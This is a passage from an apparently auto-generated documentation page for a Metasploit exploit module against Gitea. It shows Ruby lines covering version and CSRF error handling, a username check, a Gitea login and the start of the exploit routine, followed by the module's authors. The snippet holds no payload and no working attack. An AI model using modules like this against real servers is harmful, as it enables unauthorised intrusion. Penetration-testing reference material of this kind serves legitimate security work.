135:	  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError => e
136:	    return CheckCode::Detected(e.message)
137:	  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError,

USERNAME can't be blank


Here is a relevant code snippet related to the "USERNAME can't be blank" error message:

177:	    fail_with(Failure::UnexpectedReply, e.message)
178:	  end
179:	
180:	  def exploit
181:	    unless datastore['AutoCheck']
182:	      fail_with(Failure::BadConfig, 'USERNAME can\'t be blank') if datastore['username'].blank?
183:	      gitea_login(datastore['username'], datastore['password'])
184:	    end
185:	
186:	    start_service
187:	    primer

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • wuhan005
  • li4n0
  • krastanoel

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.